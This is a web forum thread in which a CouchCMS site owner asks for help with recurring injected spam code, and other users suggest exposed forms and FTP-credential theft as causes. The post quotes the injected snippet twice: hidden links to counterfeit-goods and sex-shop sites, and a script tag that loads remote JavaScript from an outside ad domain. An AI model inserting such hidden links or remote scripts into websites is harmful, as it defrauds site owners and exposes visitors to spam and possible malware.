Hi

Since a couple of weeks one of my Couch-websites is infected with spamcode below.
It puts itself just before the footertag.
I can delete it, but its coming back after a few days.

Anyone who has experience with this type of issue?

Code: Select all

<style type="text/css">.bbb{color: #e8f8fb !Important;}</style><H2 class="bbb">Great bag! <a class="bbb" href="http://www.handbagsoutlet.net/">LV</a></H2>&nbsp;<H2 class="bbb">I love it, congrats !! <a class="bbb" href="http://www.handbagsholiday.com/">lv bags</a></H2>&nbsp;<H2 class="bbb">your bag and wallet collection must be diversified like your portfolio. Some expensive, Some cheap, some old-vintage, some new. No worries. <a class="bbb" href="http://www.christmasnew.com/">louis vuitton wallet</a></H2>&nbsp;<H2 class="bbb">wow that wallet is amazing, kinda similar styling to the Eugenie? Couldn&#39;t you use the excess lots for like a license, gym membership, video card etc? <a class="bbb" href="http://www.handbagswhite.com/">lv bags</a></H2>&nbsp;<H2 class="bbb">I saw it at the LV boutique in Palm Beach Gardens, FL.The color is very unique and beautiful! I would get it if I only I could afford it.   I think empreinte leather is still second best compare to the Mahina leather.      <a class="bbb" href="http://www.wholesale6.net/">louis vuitton luggage</a></H2>&nbsp;<H2 class="bbb">EVerything is from August except the Blanc Corail Alma, the shoes and the sunnies (They were bought in July)   <a class="bbb" href="http://www.happynewsex.com/">Sex Shop</a></H2>&nbsp;<H2 class="bbb">You have a beautiful daughter! Congrats on your new bag!  <a class="bbb" href="http://www.handbagswoman.com/">louis vuitton shop</a></H2>&nbsp;<H2 class="bbb">considering what you already have, verrnis alma!!! <a class="bbb" href="http://www.handbagslover.com/">LV</a></H2>&nbsp;<span class="bbb">.</span><script type="text/javascript" src="http://ad.jiangping.org/ads.js"></script><footer>

Hi

Since a couple of weeks one of my Couch-websites is infected with spamcode below.
It puts itself just before the footertag.
I can delete it, but its coming back after a few days.

Anyone who has experience with this type of issue?

Code: Select all

<style type="text/css">.bbb{color: #e8f8fb !Important;}</style><H2 class="bbb">Great bag! <a class="bbb" href="http://www.handbagsoutlet.net/">LV</a></H2>&nbsp;<H2 class="bbb">I love it, congrats !! <a class="bbb" href="http://www.handbagsholiday.com/">lv bags</a></H2>&nbsp;<H2 class="bbb">your bag and wallet collection must be diversified like your portfolio. Some expensive, Some cheap, some old-vintage, some new. No worries. <a class="bbb" href="http://www.christmasnew.com/">louis vuitton wallet</a></H2>&nbsp;<H2 class="bbb">wow that wallet is amazing, kinda similar styling to the Eugenie? Couldn&#39;t you use the excess lots for like a license, gym membership, video card etc? <a class="bbb" href="http://www.handbagswhite.com/">lv bags</a></H2>&nbsp;<H2 class="bbb">I saw it at the LV boutique in Palm Beach Gardens, FL.The color is very unique and beautiful! I would get it if I only I could afford it.   I think empreinte leather is still second best compare to the Mahina leather.      <a class="bbb" href="http://www.wholesale6.net/">louis vuitton luggage</a></H2>&nbsp;<H2 class="bbb">EVerything is from August except the Blanc Corail Alma, the shoes and the sunnies (They were bought in July)   <a class="bbb" href="http://www.happynewsex.com/">Sex Shop</a></H2>&nbsp;<H2 class="bbb">You have a beautiful daughter! Congrats on your new bag!  <a class="bbb" href="http://www.handbagswoman.com/">louis vuitton shop</a></H2>&nbsp;<H2 class="bbb">considering what you already have, verrnis alma!!! <a class="bbb" href="http://www.handbagslover.com/">LV</a></H2>&nbsp;<span class="bbb">.</span><script type="text/javascript" src="http://ad.jiangping.org/ads.js"></script><footer>

I had a sort of similar problem. The fix for me and I'm sure is something the same for you is that you are using a databound field without checking if user is logged in.

In my case I'm using the members module.

The only way I could see them "injecting" code onto the design of your site is an exposed form that spambots can see in your post-rendered html source code.

Check any and all <cms:form> blocks and check to make sure they aren't wide open to the public. If they are, you're going to have to use an authentication measure such as

Code: Select all

<cms:if k_logged_in>
Display Form Inputs here
</cms:if>
<cms:if k_logged_out>
Display nothing
</cms:if>

Check against this couch document about user authentication :

http://www.couchcms.com/docs/concepts/users.html

[KK]

@samverdyck, adding to what @proofinlife mentioned -

There is also another very prevalent cause that you need to investigate - your local machine could contain a malware that reads username/passwords used by your FTP client and then logs into the site to make changes to the files. You can see a discussion about this here - viewtopic.php?p=8780#p8780

If your site is on a shared hosting, then it could be any other site-owner's machine/site that has been compromised and is now affecting yours.

Please do a thorough scan of your local machine.
If you are on a shared hosting start thinking about moving to an inexpensive VPS.

Hope it helps.

Hi proofinlife and KK

Thanks for your input.
I'm not using any databound field or member module, so I have to search the problem elsewhere.

The topic that KK shared seems to be well documented.
I have allready changed the ftp password, let's see what that does.

Thanks!

UPDATE
Since I changed the FTP password, the spamcode didn't come back.